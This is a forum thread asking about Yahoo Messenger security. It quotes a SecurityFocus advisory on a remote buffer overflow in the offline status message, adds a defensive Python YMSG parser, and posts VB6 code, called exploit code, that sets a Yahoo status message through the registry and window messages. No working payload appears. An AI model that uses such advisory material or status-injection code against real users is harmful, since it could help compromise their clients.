tansqrx

Yahoo Messenger Exploits? Does anyone know of any exploits in YMSG

Here's the question. Do you know of any exploits in Yahoo Messenger? The reason that I am asking is I have done quite a bit of research into the security of Messenger over the last 6 months. Actually the reason that I am trying to get web space is to publish some of my findings. I have mapped many of the Yahoo protocol packets and researched several common booters. Once I have the space I will dish out all the details. Do I have any similar Yahoo Messenger enthusiasts around that might be willing to discuss Messenger security?


Looks like I may have dug up something on my own. I searched the Full Disclosure Mailing list and found an entry at Security Focus.

Yahoo! Messenger Offline Mode Status Remote Buffer Overflow Vulnerability
http://www.securityfocus.com/bid/12750

It has been reported that a remote buffer overflow vulnerability affects Yahoo! Messenger. This issue is due to a failure of the application to securely copy user-supplied input into finite process buffers.
It is likely that the attacker must be in the contact list of an unsuspecting user to exploit this issue. It should be noted that the details surrounding this issue are not clear; this BID will be updated as more details are released.

An attacker may leverage this issue to execute arbitrary code in the context of an unsuspecting user running a vulnerable version of the affected application.


Bugtraq ID: 12750
Class: Boundary Condition Error
CVE: CVE-MAP-NOMATCH
Remote: Yes
Local: No
Published: Mar 08, 2005
Updated: Mar 08, 2005

Vulnerable:
Yahoo! Messenger 4.0
  - Microsoft Windows 2000 Professional
  - Microsoft Windows 2000 Professional SP1
  - Microsoft Windows 2000 Professional SP2
  - Microsoft Windows 95
  - Microsoft Windows 98
  - Microsoft Windows ME
  - Microsoft Windows NT Workstation 4.0
  - Microsoft Windows NT Workstation 4.0 SP1
  - Microsoft Windows NT Workstation 4.0 SP2
  - Microsoft Windows NT Workstation 4.0 SP3
  - Microsoft Windows NT Workstation 4.0 SP4
  - Microsoft Windows NT Workstation 4.0 SP5
  - Microsoft Windows NT Workstation 4.0 SP6
  - Microsoft Windows NT Workstation 4.0 SP6a
  - Microsoft Windows XP Home
Yahoo! Messenger 5.0.1232
Yahoo! Messenger 5.0.1065
Yahoo! Messenger 5.0.1046
Yahoo! Messenger 5.0
  - Microsoft Windows 2000 Professional
  - Microsoft Windows 2000 Professional SP1
  - Microsoft Windows 2000 Professional SP2
  - Microsoft Windows 95
  - Microsoft Windows 98
  - Microsoft Windows ME
  - Microsoft Windows NT Workstation 4.0
  - Microsoft Windows NT Workstation 4.0 SP1
  - Microsoft Windows NT Workstation 4.0 SP2
  - Microsoft Windows NT Workstation 4.0 SP3
  - Microsoft Windows NT Workstation 4.0 SP4
  - Microsoft Windows NT Workstation 4.0 SP5
  - Microsoft Windows NT Workstation 4.0 SP6a
  - Microsoft Windows XP Home
Yahoo! Messenger 5.5.1249
Yahoo! Messenger 5.5
Yahoo! Messenger 5.6.0.1358
Yahoo! Messenger 5.6.0.1356
Yahoo! Messenger 5.6.0.1355
Yahoo! Messenger 5.6.0.1351
Yahoo! Messenger 5.6.0.1347
Yahoo! Messenger 5.6
Yahoo! Messenger 6.0.0.1921
Yahoo! Messenger 6.0.0.1750
Yahoo! Messenger 6.0.0.1643
Yahoo! Messenger 6.0

Not Vulnerable: (none listed)


Does anyone have additional info on this exploit? Is it still valid?

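The advisory above describes the bug only as a failure to copy user-supplied input safely into finite buffers. As an added example that is not part of this thread or of any Yahoo code, here is a defensive YMSG frame parser in Python that treats the declared length and every key/value field as untrusted and rejects anything outside the bounds a handler can hold. It assumes the publicly documented YMSG layout (20-byte header: "YMSG", version, vendor id, data length, service, status, session id, then key/value pairs each terminated by the bytes C0 80); the 255-byte field cap, the service number and the key numbers in the sample frame are constructed for the demonstration.

```python
import struct

# YMSG header layout as publicly documented (assumption, not taken from this thread):
# magic "YMSG", version, vendor id, data length, service, status, session id = 20 bytes
HDR = struct.Struct(">4sHHHHII")
SEP = b"\xc0\x80"        # key/value terminator used in the YMSG body
MAX_FIELD = 255          # constructed cap: the largest value a handler's buffer may accept


def parse_ymsg(frame: bytes, max_field: int = MAX_FIELD) -> dict:
    """Parse one YMSG frame; raise ValueError on anything outside its declared bounds."""
    if len(frame) < HDR.size:
        raise ValueError("frame shorter than the 20-byte header")
    magic, version, vendor, data_len, service, status, session = HDR.unpack_from(frame)
    if magic != b"YMSG":
        raise ValueError("bad magic")
    body = frame[HDR.size:]
    # The length field is peer-controlled: compare it with what actually arrived
    # instead of using it to index the buffer.
    if data_len != len(body):
        raise ValueError(f"declared length {data_len} != actual {len(body)}")
    parts = body.split(SEP)
    if body and (len(parts) % 2 != 1 or parts[-1] != b""):
        raise ValueError("unterminated key/value pair")
    fields: dict = {}
    for key, value in zip(parts[0::2], parts[1::2]):
        # Every value (a status message included) is bounded before it is stored.
        if len(value) > max_field:
            raise ValueError(f"field {key!r} is {len(value)} bytes, cap is {max_field}")
        fields.setdefault(key.decode("ascii", "replace"), []).append(value.decode("utf-8", "replace"))
    return {"version": version, "vendor": vendor, "service": service,
            "status": status, "session": session, "fields": fields}


def build_ymsg(service: int, status: int, session: int, pairs, version: int = 12) -> bytes:
    """Serialise a frame (used here only to construct sample input)."""
    body = b"".join(k + SEP + v + SEP for k, v in pairs)
    return HDR.pack(b"YMSG", version, 0, len(body), service, status, session) + body


def is_well_formed(frame: bytes) -> bool:
    """True when the frame passes every bound check, False otherwise."""
    try:
        parse_ymsg(frame)
        return True
    except ValueError:
        return False
```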

This is a quick reply but I have some code questions. After downloading the exploit code from Security Focus I am left with more questions than answers. Below is the code snippet. I know that most exploits are published with lines missing or something important changed to keep the script kiddies from using the exploit. My problem is that this is VB 6 code and I am out of my element on this one. Could someone look at the code and see if it makes sense to them.

' Win32 API declarations (VB6 standard module). Most of these are unused by the
' three routines below; only FindWindow, SendMessageLong, SendMessageByString and
' the Reg* functions are actually called.
Public Declare Function EnableWindow Lib "user32" (ByVal hwnd As Long, ByVal fEnable As Long) As Long
Public Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
Public Declare Function FindWindowEx Lib "user32" Alias "FindWindowExA" (ByVal hWnd1 As Long, ByVal hWnd2 As Long, ByVal lpsz1 As String, ByVal lpsz2 As String) As Long
Public Declare Function GetWindow Lib "user32" (ByVal hwnd As Long, ByVal wCmd As Long) As Long
Public Declare Function PostMessage Lib "user32" Alias "PostMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
Public Declare Function SendMessageLong& Lib "user32" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, ByVal lParam As Long)
Public Declare Function SendMessageByString Lib "user32" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, ByVal lParam As String) As Long
Public Declare Function ShowWindow Lib "user32" (ByVal hwnd As Long, ByVal nCmdShow As Long) As Long
Private Declare Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long
Private Declare Function PlaySoundData Lib "winmm.dll" Alias "PlaySoundA" (lpData As Any, ByVal hModule As Long, ByVal dwFlags As Long) As Long
Public Declare Function ReleaseCapture Lib "user32" () As Long
Public Declare Function SendMessage Lib "user32" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Any) As Long
Private Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long
Private Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Private Declare Function RegDeleteKey Lib "advapi32.dll" Alias "RegDeleteKeyA" (ByVal hKey As Long, ByVal lpSubKey As String) As Long
Private Declare Function RegDeleteValue Lib "advapi32.dll" Alias "RegDeleteValueA" (ByVal hKey As Long, ByVal lpValueName As String) As Long
Private Declare Function RegOpenKey Lib "advapi32.dll" Alias "RegOpenKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Private Declare Function RegQueryValueEx Lib "advapi32.dll" Alias "RegQueryValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal lpReserved As Long, lpType As Long, lpData As Any, lpcbData As Long) As Long
Private Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long
Private Declare Function MoveWindow Lib "user32" (ByVal hwnd As Long, ByVal X As Long, ByVal Y As Long, ByVal nWidth As Long, ByVal nHeight As Long, ByVal bRepaint As Long) As Long
Private Declare Function GetWindowLong Lib "user32" Alias "GetWindowLongA" (ByVal hwnd As Long, ByVal nIndex As Long) As Long
Private Declare Function SetWindowLong Lib "user32" Alias "SetWindowLongA" (ByVal hwnd As Long, ByVal nIndex As Long, ByVal dwNewLong As Long) As Long
Private Declare Function CallWindowProc Lib "user32" Alias "CallWindowProcA" (ByVal lpPrevWndFunc As Long, ByVal hwnd As Long, ByVal Msg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
Private Declare Sub CopyMemory Lib "Kernel32" Alias "RtlMoveMemory" (pDest As Any, pSrc As Any, ByVal ByteLen As Long)
Private Declare Function SetWindowPos Lib "user32" (ByVal hwnd As Long, ByVal hWndInsertAfter As Long, ByVal X As Long, ByVal Y As Long, ByVal cx As Long, ByVal cy As Long, ByVal wFlags As Long) As Long

' Window-message and registry constants
Public Const BM_SETCHECK = &HF1
Public Const BM_GETCHECK = &HF0
Public Const CB_GETCOUNT = &H146
Public Const CB_GETLBTEXT = &H148
Public Const CB_SETCURSEL = &H14E
Public Const GW_HWNDFIRST = 0
Public Const GW_HWNDNEXT = 2
Public Const GW_CHILD = 5
Public Const LB_GETCOUNT = &H18B
Public Const LB_GETTEXT = &H189
Public Const LB_SETCURSEL = &H186
Public Const SW_HIDE = 0
Public Const SW_MAXIMIZE = 3
Public Const SW_MINIMIZE = 6
Public Const SW_NORMAL = 1
Public Const SW_SHOW = 5
Public Const VK_SPACE = &H20
Public Const WM_CHAR = &H102
Public Const WM_CLOSE = &H10
Public Const WM_COMMAND = &H111
Public Const WM_GETTEXT = &HD
Public Const WM_GETTEXTLENGTH = &HE
Public Const WM_KEYDOWN = &H100
Public Const WM_KEYUP = &H101
Public Const WM_LBUTTONDBLCLK = &H203
Public Const WM_LBUTTONDOWN = &H201
Public Const WM_LBUTTONUP = &H202
Public Const WM_MOVE = &HF012
Public Const WM_RBUTTONDOWN = &H204
Public Const WM_RBUTTONUP = &H205
Public Const WM_SETTEXT = &HC
Public Const WM_SYSCOMMAND = &H112
Const ERROR_SUCCESS = 0&
Const REG_SZ = 1
Const REG_DWORD = 4

Public Enum HKeyTypes
    HKEY_CLASSES_ROOT = &H80000000
    HKEY_CURRENT_USER = &H80000001
    HKEY_LOCAL_MACHINE = &H80000002
    HKEY_USERS = &H80000003
    HKEY_PERFORMANCE_DATA = &H80000004
End Enum

' Writes Status as custom message slot "1" of the logged-in user's profile,
' then sends WM_COMMAND (&H111) with command id 388 to the buddy-list window
' so the client picks the new status up. Nothing here touches the network.
Sub YStatus(Status As String)
    Dim Name As String
    Name = GetString(HKEY_CURRENT_USER, "Software\Yahoo\Pager", "Yahoo! user id")
    ' Value name must be a String; the original passed the bare literal 1.
    Call SaveString(HKEY_CURRENT_USER, "Software\Yahoo\Pager\profiles\" + Name + "\Custom Msgs", "1", Status)
    Dim X As Long
    On Error Resume Next
    X = FindWindow("YahooBuddyMain", vbNullString)
    SendMessageLong X, &H111, 388, 1&
End Sub

' Changes the caption of the buddy-list window via WM_SETTEXT.
Sub YCap(cap As String)
    Dim yahoobuddymain As Long
    yahoobuddymain = FindWindow("yahoobuddymain", vbNullString)
    Call SendMessageByString(yahoobuddymain, WM_SETTEXT, 0&, cap)
End Sub

' Reads a REG_SZ value: first query for its size, then fetch into a buffer
' of that size and trim at the first NUL.
Public Function GetString(hKey As HKeyTypes, strPath As String, strValue As String)
    Dim keyhand As Long
    Dim datatype As Long
    Dim lResult As Long
    Dim strBuf As String
    Dim lDataBufSize As Long
    Dim intZeroPos As Integer
    Dim lValueType As Long
    Dim r As Long   ' was undeclared in the original; fails under Option Explicit
    r = RegOpenKey(hKey, strPath, keyhand)
    lResult = RegQueryValueEx(keyhand, strValue, 0&, lValueType, ByVal 0&, lDataBufSize)
    If lValueType = REG_SZ Then
        strBuf = String(lDataBufSize, " ")
        lResult = RegQueryValueEx(keyhand, strValue, 0&, 0&, ByVal strBuf, lDataBufSize)
        If lResult = ERROR_SUCCESS Then
            intZeroPos = InStr(strBuf, Chr$(0))
            If intZeroPos > 0 Then
                GetString = Left$(strBuf, intZeroPos - 1)
            Else
                GetString = strBuf
            End If
        End If
    End If
    r = RegCloseKey(keyhand)   ' the original leaked this handle
End Function

' Creates (or opens) strPath under hKey and stores strData as a REG_SZ value.
Public Sub SaveString(hKey As HKeyTypes, strPath As String, strValue As String, strData As String)
    Dim keyhand As Long
    Dim r As Long
    r = RegCreateKey(hKey, strPath, keyhand)
    r = RegSetValueEx(keyhand, strValue, 0, REG_SZ, ByVal strData, Len(strData))
    r = RegCloseKey(keyhand)
End Sub
